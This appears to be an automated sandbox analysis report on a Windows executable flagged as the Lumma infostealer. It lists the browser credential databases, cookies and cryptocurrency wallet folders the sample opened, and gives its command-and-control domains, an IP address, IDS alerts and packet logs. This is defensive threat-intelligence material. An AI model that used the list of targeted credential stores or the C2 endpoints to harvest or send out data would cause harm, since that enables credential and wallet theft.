              Source: file.exe, 00000000.00000003.2075150921.0000000001095000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: Edge/Default/Extensions/Jaxx Liberty
              Source: file.exe, 00000000.00000003.2061774988.00000000010A6000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: window-state.json
              Source: file.exe, 00000000.00000003.2075150921.0000000001095000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: ExodusWeb3
              Source: file.exe, 00000000.00000003.2062200123.000000000109A000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance{
              Source: file.exe, 00000000.00000003.2086942025.00000000010B1000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: file.exe, 00000000.00000003.2086942025.00000000010B1000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: keystore
              Source: file.exe, 00000000.00000003.2062200123.000000000109A000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: C:\Users\user\AppData\Roaming\Ledger LiveG
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\FTPbox
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\FTPGetter
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\FTPInfo
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\ProgramData\SiteDesigner\3D-FTP
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\FTPRush
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\Ledger Live
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\Binance
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
              Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
              Source: C:\Users\user\Desktop\file.exe; Directory queried: C:\Users\user\Documents

              Remote Access Functionality

              Source: Yara match; File source: decrypted.memstr, type: MEMORYSTR
              Source: Yara match; File source: Process Memory Space: file.exe PID: 6648, type: MEMORYSTR
              Source: Yara match; File source: sslproxydump.pcap, type: PCAP
              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              Process Injection
              34
              Virtualization/Sandbox Evasion
              2
              OS Credential Dumping
              751
              Security Software Discovery
              Remote Services1
              Archive Collected Data
              21
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              Boot or Logon Initialization Scripts1
              DLL Side-Loading
              1
              Process Injection
              LSASS Memory34
              Virtualization/Sandbox Evasion
              Remote Desktop Protocol41
              Data from Local System
              2
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell
              Logon Script (Windows)Logon Script (Windows)11
              Deobfuscate/Decode Files or Information
              Security Account Manager2
              Process Discovery
              SMB/Windows Admin SharesData from Network Shared Drive113
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
              Obfuscated Files or Information
              NTDS1
              File and Directory Discovery
              Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
              Software Packing
              LSA Secrets223
              System Information Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
| Source | Detection | Scanner | Label |
|---|---|---|---|
| file.exe | 39% | ReversingLabs | Win32.Trojan.Generic |
| file.exe | 51% | Virustotal | |
| file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
| file.exe | 100% | Joe Sandbox ML | |

              No Antivirus matches
              No Antivirus matches

| Source | Detection | Scanner | Label |
|---|---|---|---|
| necklacedmny.store | 23% | Virustotal | |
| thumbystriw.store | 15% | Virustotal | |
| presticitpo.store | 11% | Virustotal | |

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| necklacedmny.store | 188.114.96.3 | true | true | | unknown |
| presticitpo.store | unknown | unknown | true | | unknown |
| thumbystriw.store | unknown | unknown | true | | unknown |
| crisiwarny.store | unknown | unknown | true | | unknown |
| fadehairucw.store | unknown | unknown | true | | unknown |

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://necklacedmny.store/api | true | | unknown |
| presticitpo.store | true | | unknown |
| scriptyprefej.store | true | | unknown |
| necklacedmny.store | true | | unknown |
| fadehairucw.store | true | | unknown |
| navygenerayk.store | true | | unknown |
| founpiuer.store | true | | unknown |
| thumbystriw.store | true | | unknown |
| crisiwarny.store | true | | unknown |

| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 188.114.96.3 | necklacedmny.store | European Union | 13335 | CLOUDFLARENETUS | true |

                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1545849
                                                                      Start date and time:2024-10-31 07:13:11 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 5m 23s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:4
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:file.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@1/0@5/1
                                                                      EGA Information:
                                                                      • Successful, ratio: 100%
                                                                      HCA Information:Failed
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

| Time | Type | Description |
|---|---|---|
| 02:14:01 | API Interceptor | 9x Sleep call for process: file.exe modified |

                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, WhiteSnake StealerBrowse
                                                                      • 188.114.96.3
                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XmrigBrowse
                                                                      • 188.114.96.3
                                                                      file.exeGet hashmaliciousXmrigBrowse
                                                                      • 188.114.96.3
                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                      • 188.114.96.3
                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                      • 188.114.96.3
                                                                      HLZwUhcJ28.exeGet hashmaliciousLummaCBrowse
                                                                      • 188.114.96.3
No context

No created / dropped files found

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.520941886294137
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 3'093'504 bytes
MD5: 900b4f529c53a8740d16c0372dc2ca9a
SHA1: 342f5cd2f6a7beecca59553f4d970454caa961ca
SHA256: d22ac8685cb5b613bf5b6271239cd4c51b680d06a41f3c4d4d5aaefbf9ad5bc6
SHA512: d7eb202fccbe787f75bead38810a34d641fd02a4a20505424d5acff45f2bf3971c426b845bfc21f7b3a228b7decde10b1fc2afec7cf9821038a44cd6fd1ee416
SSDEEP: 49152:IdFvViaekh4X2fR7S/YwI4bIBp2ptD1PH0a/eQGKH45:ILtiaeM4YRQYwI2/1HQ
TLSH: 52E55BA17545F2CBD4DA177888A7CD9AAAAD47B447208CC3AC3CB4BA7D73CD411B5C28
Icon Hash: 00928e8e8686b000
Entrypoint: 0x724000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x6715D353 [Mon Oct 21 04:06:43 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5a054 | 0x68 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x59000 | 0x340 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x5a1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x58000 | 0x27e00 | 9cc7bcc6e5de53323f057b8dae2ed808 | False | 0.998046875 | data | 7.978424243223096 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x59000 | 0x340 | 0x400 | 914cd139a383496d0085d499d138ef92 | False | 0.390625 | data | 4.997389973748798 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x5a000 | 0x1000 | 0x200 | 555a11fa24a077379003c187d9c9d020 | False | 0.14453125 | data | 0.9996515881509258 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
vphonoxp | 0x5b000 | 0x2c8000 | 0x2c7800 | 5b7331717380705f77737da97305fed7 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
aljcmtdz | 0x323000 | 0x1000 | 0x600 | 7dc2c0d1677637db72faa7d9520a1cb5 | False | 0.5631510416666666 | data | 4.924866201893006 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x324000 | 0x3000 | 0x2200 | 6e382267341306ea84ddc289d473d9c3 | False | 0.06284466911764706 | DOS executable (COM) | 0.6426252809168296 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x59058 | 0x2e6 | XML 1.0 document, ASCII text, with CRLF line terminators | | | 0.45417789757412397

DLL | Import
kernel32.dll | lstrcpy

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-31T07:14:02.863132+0100 | 2057131 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) | 1 | 192.168.2.5 | 52090 | 1.1.1.1 | 53 | UDP
2024-10-31T07:14:02.910872+0100 | 2057129 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) | 1 | 192.168.2.5 | 49889 | 1.1.1.1 | 53 | UDP
2024-10-31T07:14:02.924571+0100 | 2057127 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) | 1 | 192.168.2.5 | 62785 | 1.1.1.1 | 53 | UDP
2024-10-31T07:14:02.944497+0100 | 2057125 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) | 1 | 192.168.2.5 | 55922 | 1.1.1.1 | 53 | UDP
2024-10-31T07:14:03.060815+0100 | 2057123 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) | 1 | 192.168.2.5 | 60107 | 1.1.1.1 | 53 | UDP
2024-10-31T07:14:03.702728+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.5 | 49704 | 188.114.96.3 | 443 | TCP
2024-10-31T07:14:04.217328+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49704 | 188.114.96.3 | 443 | TCP
2024-10-31T07:14:04.217328+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49704 | 188.114.96.3 | 443 | TCP
2024-10-31T07:14:04.881356+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | TCP
2024-10-31T07:14:05.358191+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | TCP
2024-10-31T07:14:05.358191+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | TCP
2024-10-31T07:14:06.208818+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.5 | 49706 | 188.114.96.3 | 443 | TCP
2024-10-31T07:14:07.434036+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.5 | 49707 | 188.114.96.3 | 443 | TCP
2024-10-31T07:14:08.803736+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.5 | 49708 | 188.114.96.3 | 443 | TCP
2024-10-31T07:14:10.354086+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.5 | 49709 | 188.114.96.3 | 443 | TCP
2024-10-31T07:14:10.646203+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.5 | 49709 | 188.114.96.3 | 443 | TCP
2024-10-31T07:14:11.771050+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.5 | 49710 | 188.114.96.3 | 443 | TCP
2024-10-31T07:14:14.835728+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.5 | 49711 | 188.114.96.3 | 443 | TCP

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                      Oct 31, 2024 07:14:06.217298985 CET49706443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:06.217314005 CET44349706188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:06.217524052 CET44349706188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:06.228998899 CET49706443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:06.229217052 CET49706443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:06.229250908 CET44349706188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:06.727040052 CET44349706188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:06.727147102 CET44349706188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:06.727202892 CET49706443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:06.727382898 CET49706443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:06.727404118 CET44349706188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:06.827073097 CET49707443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:06.827099085 CET44349707188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:06.827167988 CET49707443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:06.827512980 CET49707443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:06.827523947 CET44349707188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:07.433953047 CET44349707188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:07.434036016 CET49707443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:07.435396910 CET49707443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:07.435404062 CET44349707188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:07.435622931 CET44349707188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:07.437129021 CET49707443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:07.437320948 CET49707443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:07.437350035 CET44349707188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:07.437402964 CET49707443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:07.437408924 CET44349707188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:07.962939978 CET44349707188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:07.962995052 CET44349707188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:07.963048935 CET49707443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:07.963205099 CET49707443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:07.963212967 CET44349707188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:08.166610956 CET49708443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:08.166660070 CET44349708188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:08.166759014 CET49708443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:08.167100906 CET49708443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:08.167114973 CET44349708188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:08.803617954 CET44349708188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:08.803735971 CET49708443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:08.805366993 CET49708443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:08.805377007 CET44349708188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:08.805605888 CET44349708188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:08.806809902 CET49708443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:08.806936979 CET49708443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:08.806969881 CET44349708188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:08.807030916 CET49708443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:08.807040930 CET44349708188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:09.490211010 CET44349708188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:09.490319967 CET44349708188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:09.490379095 CET49708443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:09.490513086 CET49708443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:09.490540981 CET44349708188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:09.739134073 CET49709443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:09.739160061 CET44349709188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:09.739227057 CET49709443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:09.739557028 CET49709443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:09.739566088 CET44349709188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:10.354012966 CET44349709188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:10.354085922 CET49709443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:10.355628014 CET49709443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:10.355634928 CET44349709188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:10.355854034 CET44349709188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:10.357357979 CET49709443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:10.357501030 CET49709443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:10.357506037 CET44349709188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:10.646189928 CET44349709188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:10.646261930 CET44349709188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:10.646478891 CET49709443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:10.646708012 CET49709443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:10.646718025 CET44349709188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:11.165236950 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.165293932 CET44349710188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:11.165369034 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.165749073 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.165765047 CET44349710188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:11.770930052 CET44349710188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:11.771049976 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.772500992 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.772512913 CET44349710188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:11.772715092 CET44349710188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:11.780011892 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.780894995 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.780926943 CET44349710188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:11.781053066 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.781090975 CET44349710188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:11.781203032 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.781220913 CET44349710188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:11.781337023 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.781368017 CET44349710188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:11.781486988 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.781522989 CET44349710188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:11.781651974 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.781677961 CET44349710188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:11.781683922 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.781699896 CET44349710188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:11.781833887 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.781852961 CET44349710188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:11.781871080 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.781975985 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.781997919 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.791493893 CET44349710188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:11.791726112 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.791754007 CET44349710188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:11.791774988 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.791789055 CET44349710188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:11.791827917 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:11.791847944 CET44349710188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:14.322335958 CET44349710188.114.96.3192.168.2.5
